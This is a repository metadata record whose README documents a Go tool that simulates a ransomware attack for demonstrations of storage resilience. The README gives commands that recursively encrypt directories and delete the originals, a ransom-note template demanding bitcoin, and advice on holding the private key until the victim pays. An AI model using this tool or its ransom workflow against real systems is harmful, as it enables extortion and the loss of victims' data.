{"id":17688816,"url":"https://github.com/marmos91/ransomware","last_synced_at":"2025-10-12T08:07:34.903Z","repository":{"id":61628577,"uuid":"550146849","full_name":"marmos91/ransomware","owner":"marmos91","description":"A simple demonstration tool to simulate a ransomware attack","archived":false,"fork":false,"pushed_at":"2023-07-06T11:06:35.000Z","size":44,"stargazers_count":39,"open_issues_count":0,"forks_count":8,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-10-12T08:07:33.752Z","etag":null,"topics":["decryption","encryption","ransomware","rsa"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/marmos91.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-10-12T09:23:46.000Z","updated_at":"2025-09-29T15:48:25.000Z","dependencies_parsed_at":"2024-06-20T16:33:59.892Z","dependency_job_id":"7fcf1a1e-b7fd-455c-b87d-c39ad4058941","html_url":"https://github.com/marmos91/ransomware","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/marmos91/ransomware","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/marmos91","download_url":"https://codeload.github.com/marmos91/ransomware/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279010800,"owners_count":26084807,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-12T02:00:06.719Z","response_time":53,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["decryption","encryption","ransomware","rsa"],"created_at":"2024-10-24T11:45:37.326Z","updated_at":"2025-10-12T08:07:34.885Z","avatar_url":"https://github.com/marmos91.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ransomware-example\n\nA simple demonstration tool to simulate a ransomware attack locally\n\n## ⚠️ Disclaimer ⚠️\n\nThis software is made just for demonstration and study purposes.\nIf you want to run it locally for tests, take care of what directories you decide to encrypt. The software is distributed in MIT license.\nIts use is free, however the author doesn't take responsibility for any illegal use of the code by 3rd parties.\n\n## Setup\n\nTo setup the tool just run\n\n```bash\ngo install github.com/marmos91/ransomware@latest\n```\n\n### Setup locally\n\nTo run the tool locally without installing it\n\n```bash\ngo run main.go\n```\n\n## Why\n\nIn order to demonstrate the way ransomware works quickly and in a protected environment, **it is very useful to be able to restrict its operation within a directory**.\nThis way the process takes much less time (the entire operating system does not need to be encrypted).\nWriting this tool in Go, also **allows the tool to be developed even in a non-Windows environment** (by far the most supported operating system by ransomware available online)\n\n## Demo\n\nThis project was used to showcase the resilience of [Cubbit](https://www.cubbit.io)'s object storage to this type of attack, demonstrating how it is possible to defend against such a tool using.\nCubbit's features ([versioning](https://docs.cubbit.io/guides/bucket-and-object-versioning), [object locking](https://docs.cubbit.io/guides/object-lock)).\n\nThe whole thing is available in a video demo that can be found [here](https://www.youtube.com/watch?v=w4vfng17eYg).\n\n[![Watch the video](https://markdown-videos.vercel.app/youtube/w4vfng17eYg)](https://youtu.be/w4vfng17eYg)\n\nThe restore tool used in the demo is available [here](https://github.com/marmos91/s3restore).\n\n## How to use it\n\nThis tool is used to simulate a ransomware attack. With it you can perform the following actions:\n\n1. After setting up a key, recursively encrypt the contents of a specified path\n2. After asking for a key, recursively decrypt the contents of a specified path\n\n## Help\n\n```bash\nNAME:\n   ransomware - A simple demonstration tool to simulate a ransomware attack\n\nUSAGE:\n   ransomware [global options] command [command options] [arguments...]\n\nVERSION:\n   v1.0.0\n\nAUTHOR:\n   Marco Moschettini \u003cmarco.moschettini@cubbit.io\u003e\n\nCOMMANDS:\n   create-keys, c  Generates a new random keypair and saves it to a file\n   encrypt, e      Encrypts a directory\n   decrypt, d      Decrypts a directory\n   help, h         Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n   --verbose      Runs the tool in verbose mode (more logs) (default: false)\n   --help, -h     show help (default: false)\n   --version, -v  print the version (default: false)\n```\n\n## Create a keypair\n\nFirst thing you need to do is to create a keypair. You can do it by running\n\n```bash\nransomware create-keys --path ~/Desktop\n```\n\nIf you don't specifiy a path it will create the keys in `pwd`.\nThis command will create two files:\n\n- pub.pem\n- priv.pem\n\nIn a real scenario you need to put the `private key` in a server and provide it only after the victim payed the ransom. The public key needs instead to be embedded in the ransomware to encrypt the folders\n\n## Encrypt a directory\n\nWith this command you can recursively encrypt every file inside a specified directory.\n\n```bash\nNAME:\n   ransomware encrypt - Encrypts a directory\n\nUSAGE:\n   ransomware encrypt [command options] [arguments...]\n\nOPTIONS:\n   --path value, -p value      Runs the tool on a directory\n   --publicKey value           Loads the provided RSA public key in PEM format\n   --extBlacklist value        the extension to blacklist (default: \".enc\")\n   --extWhitelist value        the extension to whitelist\n   --skipHidden                skips hidden folders (default: false)\n   --dryRun                    encrypts files without deleting originals (default: false)\n   --encSuffix value           defines the suffix to add to encrypted files (default: \".enc\")\n   --addRansom                 if set to true add a ransom note to every encrypted folder (default: false)\n   --ransomTemplatePath value  defines where to find the template to use for the ransom note\n   --ransomFileName value      defines the name of the ransom file name (default: \"IMPORTANT.txt\")\n   --bitcoinCount value        how many bitcoins to ask as ransom (default: 0)\n   --bitcoinAddress value      the bitcoin address to use (default: \"\u003cbitcoin address\u003e\")\n   --help, -h                  show help (default: false)\n```\n\nFor example if you want to run the tool on the `~/Documents` folder run:\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Documents\n```\n\nThis command provides the following options:\n\n- `path`: the path to encrypt. This is required\n- `publicKey`: the path of the publicKey PEM file created by the `create-keys` command\n- `extBlacklist`: if provided, a comma-separated list of extension to skip. **This feature is useful, to exclude executable like `.exe` files**\n- `extWhitelist`: if provided, a comma-separated list of extension to whitelist\n- `skipHidden`: if set, skips hidden folders\n- `dryRun`: just creates encrypted files without deleting originals\n- `encSuffix`: defines a custom extension to set on encrypted files (default `.enc`)\n- `addRansom`: if the tool should generate a new ransom.txt file for each encrypted folder\n- `ransomTemplatePath`: the path of the template to use as ransom\n- `ransomFileName`: the name to give to the ransom file\n- `bitcoinCount`: how many bitcoin to ask as ransom\n- `bitcoinAddress`: the bitcoin address to use inside the ransom file\n\n### Examples\n\nJust encrypt gif files on Desktop\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Desktop --extWhitelist .gif\n```\n\nEncrypt everything except `.csv` and `.pdf` files\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Desktop --extBlacklist .csv,.pdf\n```\n\nEncrypt everything and add a ransom file\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Desktop --addRansom --ransomTemplatePath ./ransom/IMPORTANT.txt\n```\n\n### Ransom file\n\nThis is an example of ransom file. The templated strings `{{.BitcoinAddress}}`, `{{.BitcoinCount}}` and `{{.PubliKey}}` will be replace by the script. Please check encrypt options to see options available\n\n```txt\n!!! IMPORTANT !!!\n\nAll of your files are encrypted with RSA 4096 and AES 256 ciphers.\nMore information about RSA and AES can be found here:\n- https://en.wikipedia.org/wiki/RSA_(cryptosystem)\n- https://en.wikipedia.org/wiki/Advanced_Encryption_Standard\n\nDecrypting of your files is only possible with the private key and decrypt program, which is not available to you.\nTo receive your private key please send {{.BitcoinCount}}BTC to {{.BitcoinAddress}} together with the public key used to encrypt your files\n\nThe public key to use in the form is\n\n{{.PublicKey}}\n```\n\n## Decrypt a directory\n\nWith this command you can decrypt a folder back to its original form after a victim payed the ransom\n\n```bash\nNAME:\n   ransomware decrypt - Decrypts a directory\n\nUSAGE:\n   ransomware decrypt [command options] [arguments...]\n\nOPTIONS:\n   --path value, -c value  Runs the tool on a directory\n   --privateKey value      Loads the provided RSA private key in PEM format\n   --dryRun                decrypts files without deleting encrypted versions (default: false)\n   --encSuffix value       defines the suffix to add to encrypted files (default: \".enc\")\n   --ransomFileName value  defines the name of the ransom file name (default: \"IMPORTANT.txt\")\n   --help, -h              show help (default: false)\n```\n\nFor example if you want to run the tool on the `~/Documents` folder run:\n\n```bash\nransomware decrypt --privateKey ./priv.pem --path ~/Desktop/toEncrypt\n```\n\nThis command provides the following options:\n\n- `path`: the path to encrypt. This is required\n- `privateKey`: the path of the privateKey PEM file created by the `create-keys` command\n- `dryRun`: just creates decrypted files without deleting encrypted version\n- `encSuffix`: defines a custom extension for encrypted files (default `.enc`)\n- `ransomFileName`: defines the name of the ransom file. Needed to delete the files previously generated\n\n## How it works\n\nThe tool implements a [**hybrid encryption strategy**](\u003chttps://www.picussecurity.com/resource/the-most-common-ransomware-ttp-mitre-attck-t1486-data-encrypted-for-impact#:~:text=In%20the%20hybrid%20encryption%20approach,(public%20key)%20encryption%20algorithm.\u003e) making use of two different algorithms:\n\n- [AES256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard)\n- [RSA2048](\u003chttps://en.wikipedia.org/wiki/RSA_(cryptosystem)\u003e)\n\nThe reason for this choice is related to the different nature of the two encryption algorithms. **A hybrid approach takes advantage of the performance of AES to execute faster, while at the same time not providing the decryption key within the executable**.\n\nA new random AES key is then generated for the session each time the tool is executed. **This key is used to encrypt all files in the selected folder**. For later retrieval, this key is **encrypted with the public RSA key provided** to the tool and prepended to all encrypted files.\n\nIn this way, the tool, provided with the corresponding private key, will be able to **read the AES key at the beginning of each file, decrypt it, and finally use it to decrypt the file**.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarmos91%2Fransomware","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmarmos91%2Fransomware","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarmos91%2Fransomware/lists"}